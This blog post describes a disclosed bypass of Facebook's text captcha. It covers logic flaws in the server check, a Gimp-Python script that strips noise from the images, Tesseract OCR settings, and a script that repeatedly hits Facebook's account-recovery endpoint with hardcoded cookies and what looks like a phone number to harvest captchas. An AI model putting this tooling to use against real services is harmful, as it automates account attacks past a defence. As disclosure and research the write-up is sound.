The Facebook Captcha(s)
I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).
The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:
Let's look at some ways to bypass the text captcha :)
A couple of logic flaws...
My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.
Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.
Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.
Issue #3 - Captcha repetition...
Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.
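As a rough illustration of how repetition could be spotted in a folder of downloaded images, the sketch below groups files by a hash of their bytes. It assumes a repeated captcha is served as a byte-identical file, which is a guess rather than something confirmed here. The function name `find_repeats` and the default filename pattern are purely illustrative.

```python
import hashlib
from collections import defaultdict
from pathlib import Path

def find_repeats(folder, pattern="fbcap*.png"):
    """Group image files by the SHA-256 of their bytes.

    Assumption: a repeated captcha arrives as a byte-identical file.
    If the server re-renders the same string, this will not catch it.
    """
    groups = defaultdict(list)
    for path in sorted(Path(folder).glob(pattern)):
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        groups[digest].append(path.name)
    # Keep only the hashes that were seen more than once
    return [names for names in groups.values() if len(names) > 1]
```

Calling `find_repeats(".")` returns a list of filename groups, one group per image that showed up more than once.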
The logic flaws were interesting but let's not forget OCR as well!
Back to the image...
Let's take a look at a Facebook captcha image:
When thinking about OCR analysis there are a few things to note:
- Letters/numbers themselves are clearly displayed in black - Good
- Minimal overlaying, wiggling and distortion is used - Good
- Black scribbles add noise to the background - Bad
- White scribbles effectively remove pixels from the characters - Bad
Step #1 Cleaning
I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.
So first up I loaded the image and doubled its size. I found that processing a smaller image was less accurate and reduced the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)
Next I removed the background noise. Selecting by color (black) and then shrinking the selection deselects the thin black lines, leaving just the thicker black letters. To actually paint over the noise I just had to re-grow my selection, invert it and paint white.
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)
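The shrink-then-grow trick is close to what image processing people call a morphological opening. Here is a minimal pure-Python sketch of the idea on a tiny 0/1 grid. It is not what Gimp does internally: the 3x3 neighbourhood is an assumption, and it grows by 1 pixel (not 2 as in the script) so the surviving shape comes back at its original size.

```python
def _at(mask, y, x):
    """Read a pixel, treating anything outside the image as background (0)."""
    if 0 <= y < len(mask) and 0 <= x < len(mask[0]):
        return mask[y][x]
    return 0

def _block(mask, y, x):
    """The 3x3 block of pixels centred on (y, x)."""
    return [_at(mask, y + dy, x + dx) for dy in (-1, 0, 1) for dx in (-1, 0, 1)]

def shrink(mask):
    """Erode by 1 pixel: keep a pixel only if its whole 3x3 block is set."""
    return [[int(all(_block(mask, y, x))) for x in range(len(mask[0]))]
            for y in range(len(mask))]

def grow(mask):
    """Dilate by 1 pixel: set a pixel if anything in its 3x3 block is set."""
    return [[int(any(_block(mask, y, x))) for x in range(len(mask[0]))]
            for y in range(len(mask))]

# Toy image: a 1-pixel-thick "scribble" above a 3x3 "character"
mask = [
    [0, 0, 0, 0, 0, 0, 0],
    [1, 1, 1, 1, 1, 1, 1],  # thin noise line
    [0, 0, 0, 0, 0, 0, 0],
    [0, 0, 1, 1, 1, 0, 0],
    [0, 0, 1, 1, 1, 0, 0],
    [0, 0, 1, 1, 1, 0, 0],
    [0, 0, 0, 0, 0, 0, 0],
]

cleaned = grow(shrink(mask))
for row in cleaned:
    print("".join("#" if p else "." for p in row))
```

The thin line has no pixel whose full neighbourhood is set, so the shrink wipes it out completely and the grow has nothing to bring back. The thicker block keeps its centre pixel and is restored.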
With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection up 4 pixels and paint
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection down 10 pixels and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)
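To show why translating and repainting closes horizontal streaks, here is a small sketch of the same idea on a 0/1 grid: the character mask is painted again at a couple of vertical offsets and the results are combined. The helper names and the offsets of 1 and -1 are placeholders for a toy grid, not the values used in the Gimp script.

```python
def shift_rows(mask, dy):
    """Return a copy of mask moved dy rows (positive = down), padded with 0."""
    h, w = len(mask), len(mask[0])
    return [list(mask[y - dy]) if 0 <= y - dy < h else [0] * w
            for y in range(h)]

def union(a, b):
    """Pixel-wise OR of two masks of the same size."""
    return [[pa | pb for pa, pb in zip(ra, rb)] for ra, rb in zip(a, b)]

def fill_streaks(mask, offsets=(1, -1)):
    """Paint the mask again at each vertical offset and keep everything painted."""
    out = mask
    for dy in offsets:
        out = union(out, shift_rows(mask, dy))
    return out

# Toy character with a one-row white streak through the middle
glyph = [
    [0, 1, 1, 1, 0],
    [0, 1, 1, 1, 0],
    [0, 0, 0, 0, 0],  # white streak
    [0, 1, 1, 1, 0],
    [0, 1, 1, 1, 0],
]

filled = fill_streaks(glyph)
for row in filled:
    print("".join("#" if p else "." for p in row))
```

The trade-off is that the characters get smeared vertically as well, so offsets much larger than the streaks would start to blur the letter shapes.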
With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)
I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"
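If you wanted to run the cleaner over a batch of files, something like the following sketch could build the same command from Python. The helper names `gimp_clean_cmd` and `clean_all` are made up for illustration, and it assumes the gimp-console binary is on your PATH and the python-clean plugin is registered.

```python
import subprocess

GIMP = "gimp-console-2.8.exe"  # binary name taken from the command above

def gimp_clean_cmd(filename):
    """Build the argument list for one non-interactive python-clean run."""
    # Filenames containing quotes or backslashes would need escaping
    # inside the batch string; this sketch does not handle that.
    batch = '(python-clean RUN-NONINTERACTIVE "%s")' % filename
    return [GIMP, "-i", "-b", batch, "-b", "(gimp-quit 0)"]

def clean_all(filenames):
    """Run the cleaning script on each file in turn."""
    for name in filenames:
        subprocess.run(gimp_clean_cmd(name), check=True)
```

Passing a list to `subprocess.run` avoids having to hand-escape the inner quotes the way the one-line command does.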
As an example, cleaning the image above I got this:
Step #2 Submitting to Tesseract
With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.jpg output -psm 8 nobatch fb
I created the fb character set as a config file in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs"; it contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
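For scripting this step, a small wrapper along these lines should work. It is only a sketch: the function names are invented here, the flags are copied from the command above, and newer Tesseract releases spell the page segmentation flag `--psm` instead of `-psm`.

```python
import string
import subprocess

# Same 62 characters as the whitelist above
WHITELIST = string.ascii_lowercase + string.ascii_uppercase + "1234567890"

def fb_config_text():
    """Contents of the 'fb' config file."""
    return "tessedit_char_whitelist " + WHITELIST + "\n"

def tesseract_cmd(image, out_base="output"):
    """Argument list matching the command line above."""
    return ["tesseract.exe", image, out_base, "-psm", "8", "nobatch", "fb"]

def ocr(image, out_base="output"):
    """Run Tesseract on one image and return the recognised text."""
    subprocess.run(tesseract_cmd(image, out_base), check=True)
    # Tesseract writes its result to <out_base>.txt
    with open(out_base + ".txt") as fh:
        return fh.read().strip()
```

`ocr("test.jpg")` would then return the guessed captcha string, ready to be compared or submitted.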
Step #3 Automate everything with Python
I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking don't actually do this!)
Theoretically though if you did want to build a fully functioning script you'd just need to take the python script from my Bugcrowd post and cleaning script from this post, combine and pwn.
Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
    try:
        print("[+] POSTing to fb");
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;')
        #Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        global ccode
        ccode = re.findall('[a-z0-9-]{43}', response)
        global chash
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response");
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

def getcaptcha(i):
    try:
        print("[+] Downloading Captcha");
        captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1]
        urlretrieve(captchaurl,'fbcap'+str(i)+'.png')
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

print("[+] Start!");
for i in range(0, 1000):
    #Download page and parse data
    getpage();
    #Download captcha image
    getcaptcha(i);
print("[+] Finished!");
Final Results
So I guess you're wondering, how accurate was Tesseract? Well on a sample of 50 captchas that had been cleaned with Gimp, Tesseract was able to analyse them 100% correctly about 20% of the time. However taking into account the logic flaws the actual pass rate jumped to 50%.
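To make the difference between the two numbers concrete, here is a sketch of how a strict and a lenient pass rate could be scored. The lenient check is only my model of Issues #1 and #2 (ignore case, tolerate one wrong character, same length required), not Facebook's actual server logic, and the sample pairs are made up for illustration rather than taken from my test set.

```python
def differences(truth, guess):
    """Count positions where two strings differ, ignoring case."""
    return sum(a != b for a, b in zip(truth.lower(), guess.lower()))

def strict_pass(truth, guess):
    """What a correct captcha check would do: exact match only."""
    return truth == guess

def lenient_pass(truth, guess, allowed_wrong=1):
    """Assumed model of the flawed check: case-insensitive, one miss allowed."""
    return len(truth) == len(guess) and differences(truth, guess) <= allowed_wrong

def pass_rates(pairs):
    """Return (strict rate, lenient rate) over (truth, guess) pairs."""
    strict = sum(strict_pass(t, g) for t, g in pairs)
    lenient = sum(lenient_pass(t, g) for t, g in pairs)
    return strict / len(pairs), lenient / len(pairs)

# Made-up (truth, OCR guess) pairs, NOT results from the 50-captcha sample
samples = [
    ("aB3dE9k", "aB3dE9k"),  # exact match
    ("Qw7RtY2", "qw7rty2"),  # wrong case only
    ("mN4pL8x", "mN4pL8k"),  # one wrong character
    ("Zx5cV6b", "Zx6cV8b"),  # two wrong characters
]

print(pass_rates(samples))
```

Only the first pair passes a strict check, while the first three pass the lenient one, which is the same kind of jump described above.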
Some example results:
It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. That said, you can also see how even subtle changes in the initial image can significantly affect both the cleaning output and the final analysis.
Facebook Fix #1
After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:
Unfortunately this had little effect on the captcha strength, as it's the thickness of the noise relative to the characters that matters, not the absolute thickness. Making the noise thicker and the characters thinner would have prevented noise removal through selection shrinking.
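The relative-thickness point can be checked with a simple one-dimensional model: a stroke only survives a shrink if some pixel is further than the shrink distance from both edges. The widths below are illustrative numbers, not measurements from the real images, and the function names are just for this sketch.

```python
def survives(width, shrink):
    """A stroke `width` pixels thick survives a shrink of `shrink` pixels
    only if at least one pixel is more than `shrink` from both edges."""
    return width > 2 * shrink

def separating_shrinks(noise_width, char_width):
    """Shrink amounts that erase the noise but keep the characters."""
    return [s for s in range(1, char_width)
            if not survives(noise_width, s) and survives(char_width, s)]

# Illustrative widths only
print(separating_shrinks(2, 6))    # thin noise, thick characters
print(separating_shrinks(4, 12))   # both made thicker
print(separating_shrinks(6, 2))    # noise thicker than characters
```

In this model, thickening both noise and characters still leaves shrink values that separate them, whereas making the noise thicker than the characters leaves none.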
Final Thoughts
Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% exact-match rate (50% once the logic flaws were taken into account), and I'm sure with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.
Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.
Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.
Pwndizzle out
############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1
from gimpfu import pdb, main, register, PF_STRING
def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    pdb.gimp_image_scale(image,560,142)
    #Select by color black
    pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
    #Shrink selection by 1 pixel
    pdb.gimp_selection_shrink(image,1)
    #Grow selection by 2 pixels
    pdb.gimp_selection_grow(image,2)
    #Fill black
    pdb.gimp_context_set_foreground((0,0,0))
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    #Fill white
    pdb.gimp_context_set_foreground((255,255,255))
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    pdb.gimp_context_set_foreground((0,0,0))
    #Translate selection up 4 pixels and paint
    pdb.gimp_selection_translate(image,0,4)
    pdb.gimp_edit_fill(drawable,0)
    #Translate selection down 10 pixels and paint
    pdb.gimp_selection_translate(image,0,-10)
    pdb.gimp_edit_fill(drawable,0)
    #Resize image
    pdb.gimp_image_scale(image,280,71)
    #Export
    pdb.gimp_file_save(image, drawable, file, file)
    pdb.gimp_image_delete(image)
args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)
main()
############################################